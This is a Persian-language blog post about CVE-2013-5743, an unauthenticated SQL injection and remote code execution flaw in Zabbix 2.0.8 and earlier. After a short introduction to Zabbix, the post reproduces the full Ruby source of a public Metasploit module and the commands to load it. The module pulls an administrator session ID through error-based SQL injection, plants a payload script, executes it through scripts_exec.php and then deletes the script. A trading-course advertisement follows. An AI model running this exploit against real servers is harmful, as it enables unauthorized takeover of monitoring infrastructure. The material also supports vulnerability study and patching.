آسیب پذیری در Zabbix

آسیب پذیری در Zabbix

ابتدا مختصر توضیحی در رابطه با نرم افزار Zabbix بدهیم برای افرادی که اشنا نیستند

یک نرم‌ افزار متن باز که در تاریخ آوریل 19 آوریل 2001 به منظر پایش و داشتن نظارت و بررسی کامل لحظه ایی بر روی شبکه ‌ها و نرم‌افزار ها در سطح Enterprise توسط اقای وسط الکسی ولادیشو ارائه شده است. این نرم‌افزار برای پایش و تشخیص وضعیت سرویس‌های شبکه‌ها، سرورها و دیگر سخت افزارهای شبکه طراحی شده‌است.

برای شما

دو آسیب پذیری Sql injection و Remote Code Execution در Zabbix نسخه 2.0.8 و نسخه های پایین تر

از این بابت در Zabbix فرد مهاجم توانایی تزریق Sql و انجام حمله Sql injection را دارد. از این رو اگر برای یک کاربر سطح Administrators مشخص شود کاربر با Upload سازی اسکریپت های از راه دور از طریق فایل scripts_exec.php، توانایی اجرای دستورات خود را از راه دور دارد و این کار موجب ایجاد شدن آسیب پذیری RCE مخفف Remote Code Execution شده است. ‌Exploit این آسیب پذیری در Metasploit قابل بهرداری می باشد.

برای دسترسی به Exploit این آسیب پذیری به مسیر زیر بروید

1msf5 > use exploit/linux/http/zabbix_sqli 
1msf5 exploit(linux/http/zabbix_sqli) >

Source-Code Exploit:

1## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info={}) super(update_info(info,    'Name'      => "Zabbix 2.0.8 SQL Injection and Remote Code Execution",    'Description'  => %q{     This module exploits an unauthenticated SQL injection vulnerability affecting Zabbix     versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an     active session ID. If an administrator level user is identified, remote code execution     can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.    },    'License'    => MSF_LICENSE,    'Author'     =>     [      'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept 'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module    ],    'References'   =>     [      ['CVE', '2013-5743'],      ['URL', 'https://support.zabbix.com/browse/ZBX-7091']     ],    'Platform'    => ['unix'],    'Arch'      => ARCH_CMD,    'Targets'    =>     [      ['Zabbix version <= 2.0.8', {}]     ],    'Privileged'   => false,    'Payload'    =>     {      'Space'    => 255,      'DisableNops' => true,      'Compat'   =>       {        'PayloadType' => 'cmd',        'RequiredCmd' => 'generic perl python'      }     },    'DisclosureDate' => "Sep 23 2013",    'DefaultTarget' => 0))    register_options(     [      OptString.new('TARGETURI', [true, 'The URI of the vulnerable Zabbix instance', '/zabbix'])     ])  end def uri return target_uri.path  end def check # Check version  vprint_status("Trying to detect installed version")   res = send_request_cgi({    'method' => 'GET',    'uri'  => normalize_uri(uri, "httpmon.php")   })   if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/   version = $1    vprint_status("Zabbix version #{version} detected")   else # If this fails, guest access may not be enabled   vprint_status("Unable to access httpmon.php")    return Exploit::CheckCode::Unknown   end if version and version <= "2.0.8" return Exploit::CheckCode::Appears   else return Exploit::CheckCode::Safe   end end def get_session_id # Generate random string and convert to hex  sqlq = rand_text_alpha(8)   sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join   sqli = "2 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST"  sqli << "(sessionid AS CHAR),0x20)),1,50) FROM zabbix.sessions WHERE status=0 and userid=1 "  sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" # Extract session id from database  res = send_request_cgi({    'method' => 'GET',    'uri'  => normalize_uri("#{uri}", "httpmon.php"),    'vars_get' => {     "applications" => sqli    }   })   if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/   session = $1    print_status("Extracted session cookie - [ #{session} ]")    return session   else   fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session")   end end def exploit # Retrieve valid session id  @session = get_session_id   @sid = "#{@session[16..-1]}"  script_name = rand_text_alpha(8)   # Upload script  print_status("Attempting to inject payload")   res = send_request_cgi({    'method' => 'POST',    'cookie' => "zbx_sessionid=#{@session}",    'uri'  => normalize_uri(uri, "scripts.php"),    'vars_post' => {     'sid' => @sid,     'form' => 'Create+script',     'name' => script_name,     'type' => '0',     'execute_on' => '1',     'command' => payload.encoded,     'commandipmi' => '',     'description' => '',     'usrgrpid' => '0',     'groupid' => '0',     'access' => '2',     'save' => 'Save'   }   })   if res and res.code == 200 and res.body =~ /(Script added)/   print_good("Payload injected successfully")   else   fail_with(Failure::Unknown, "#{peer} - Payload injection failed!")   end # Extract 'scriptid' value  @scriptid = /(?<=scriptid=)(\d+)(?=&sid=#{@sid}">#{script_name})/.match(res.body)   # Trigger Payload  res = send_request_cgi({    'method' => 'GET',    'uri'  => normalize_uri("#{uri}", "scripts_exec.php"),    'cookie' => "zbx_sessionid=#{@session}",    'vars_get' => {     "execute" =>1,     "scriptid" => @scriptid,     "sid" => @sid,     "hostid" => "10084"   }   })  end def cleanup  post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)"  print_status("Cleaning script remnants")   res = send_request_cgi({   'method' => 'POST',    'data'  => post_data,    'cookie' => "zbx_sessionid=#{@session}",    'uri'  => normalize_uri(uri, "scripts.php")   })   if res and res.code == 200 and res.body =~ /(Script deleted)/   print_good("Script removed successfully")   else   print_warning("Unable to remove script #{@scriptid}")   end end end

Github: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zabbix_sqli.rb

description:

ID MSF:EXPLOIT/LINUX/HTTP/ZABBIX_SQLI

Type metasploit

Reporter Rapid7

Modified 2017-07-24 13:26:21

CVSS 7.5

References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5743

https://support.zabbix.com/browse/ZBX-7091

نویسنده مطلب: amirhoseintangsirinet

منبع مطلب

به فکر سرمایه‌گذاری هستی؟

با هر سطحی از دانش در سریع‌ترین زمان با آموزش گام به گام، سرمایه گذاری را تجربه کن. همین الان میتونی با لینک زیر ثبت نام کنی و ۱۰ درصد تخفیف در کارمزد معاملاتی داشته باشی

ثبت نام و دریافت جایزه
ممکن است شما بپسندید
نظر شما درباره این مطلب

آدرس ایمیل شما منتشر نخواهد شد.